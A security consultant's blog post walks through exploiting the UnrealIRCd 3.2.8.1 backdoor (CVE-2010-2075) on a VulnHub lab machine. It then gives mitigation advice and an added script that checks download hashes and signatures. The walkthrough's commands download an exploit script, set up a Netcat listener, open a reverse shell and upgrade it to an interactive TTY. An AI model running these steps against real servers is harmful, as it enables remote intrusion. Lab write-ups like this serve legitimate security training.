chancej715

Security Consultant

Introduction

In this post I will describe how to exploit CVE-2010-2075 to execute arbitrary commands on UnrealIRCd version 3.2.8.1.

Description

UnrealIRCd version 3.2.8.1 contains a trojan horse which allows remote attackers to execute arbitrary commands. According to this full disclosure, the UnrealIRCd website and mirror FTP servers had been compromised, and a malicious attacker replaced the Unreal3.2.8.1.tar.gz file with a version containing a backdoor which allowed an attacker to execute arbitrary commands with the privileges of the user running the ircd.

Environment

To demonstrate the exploitation of this vulnerability, I will be using the SUNSET: NOONTIDE box by whitecr0wz on VulnHub, which is running an UnrealIRCd version 3.2.8.1 server. Set up the box and obtain its IP address.

Next, download a copy of the exploit to your local machine:

wget https://raw.githubusercontent.com/chancej715/UnrealIRCD-3.2.8.1-Backdoor-Command-Execution/main/script.py

Note that this exploit requires Python 3 to be installed.

Methodology

Before executing the script, you must set up a Netcat listener on your local machine:

nc -lp 4444

The script is run against the target machine with the following syntax:

python3 script.py <target> <tport> <listen> <lport>
  • <target> IP address of the target machine.
  • <tport> TCP port on which the UnrealIRCd server is listening.
  • <listen> IP address of the host running the Netcat listener.
  • <lport> TCP port on which the Netcat listener is listening.

In my case, I will run the following command:

python3 script.py 192.168.1.3 6697 192.168.1.2 4444

After a few seconds, I type ls in my Netcat listener, and I see some output:

ls
aliases
autoconf
badwords.channel.conf
badwords.message.conf
badwords.quit.conf
Changes
Changes.old
Config
config.guess
config.log
config.settings
...

At this point I can optionally upgrade this reverse shell to a fully interactive TTY:

python3 -c "import pty;pty.spawn('/bin/bash')"

Results

I now have an interactive shell on the machine, on which I can execute arbitrary commands:

server@noontide:~/irc/Unreal3.2$ id
uid=1000(server) gid=1000(server) groups=1000(server),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)

In this case, I can execute commands as the user server. According to the full disclosure linked above, I can execute any command with the privileges of the user running the ircd, in this case the server user.

Mitigation

Be sure to use the latest version of UnrealIRCd. It is best practice to verify the integrity of downloaded software before installing it, either by checking its PGP (GPG) signature or by computing the hash of the downloaded file(s) on your local machine and comparing it with the hash published on the maintainer's website.
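The following script is an added example of the integrity check described above; it is not part of the original post or of the UnrealIRCd project. It computes the SHA-256 of a downloaded archive, compares it with the digest you copied from the maintainer's website, and wraps the detached-signature check with gpg. The file name, the expected digest and the demo contents are constructed placeholders; in real use, substitute the archive you downloaded and the hash or signature published out-of-band by the maintainer.

```shell
#!/bin/sh
# Added example: verify a downloaded tarball against a published SHA-256 and,
# optionally, a detached PGP signature. All file names and digests below are
# constructed for illustration.

# Portable SHA-256 of a file (Linux: sha256sum, macOS/BSD: shasum -a 256).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_sha256 FILE EXPECTED_HEX
# Returns 0 when the file's digest equals EXPECTED_HEX (case-insensitive), 1 otherwise.
verify_sha256() {
    actual=$(sha256_of "$1" | tr 'A-F' 'a-f')
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    if [ "$actual" = "$expected" ]; then
        echo "OK: $1 matches the published SHA-256"
        return 0
    fi
    echo "MISMATCH: $1 does not match the published SHA-256" >&2
    echo "  expected: $expected" >&2
    echo "  actual:   $actual" >&2
    return 1
}

# verify_signature FILE SIGFILE
# Checks a detached PGP signature with gpg. The maintainer's public key must
# already be in your keyring, imported from a source other than the download
# mirror itself; a compromised mirror can replace the tarball, the hash file
# and the signature together.
verify_signature() {
    gpg --verify "$2" "$1"
}

# Constructed demonstration: a stand-in "archive" with a known digest, then the
# same file after it has been altered, as a replaced download would be.
demo() {
    tmp=$(mktemp -d)
    archive="$tmp/Unreal.tar.gz"                 # placeholder name, not a real download
    printf 'hello\n' > "$archive"
    # SHA-256 of the bytes "hello\n"; stands in for the digest copied from the website.
    published='5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03'

    if verify_sha256 "$archive" "$published"; then good=0; else good=1; fi

    printf 'hello\ntampered\n' > "$archive"     # simulate a modified archive
    if verify_sha256 "$archive" "$published"; then bad=0; else bad=1; fi

    rm -rf "$tmp"
    # The check should accept the untouched file and reject the altered one.
    [ "$good" -eq 0 ] && [ "$bad" -eq 1 ]
}

demo
```

In practice you would run verify_sha256 on the archive you just fetched with the digest from the maintainer's page, and verify_signature on it with the .asc file if one is provided; the script refuses the file (non-zero exit) as soon as either check fails, so it can gate an automated install step.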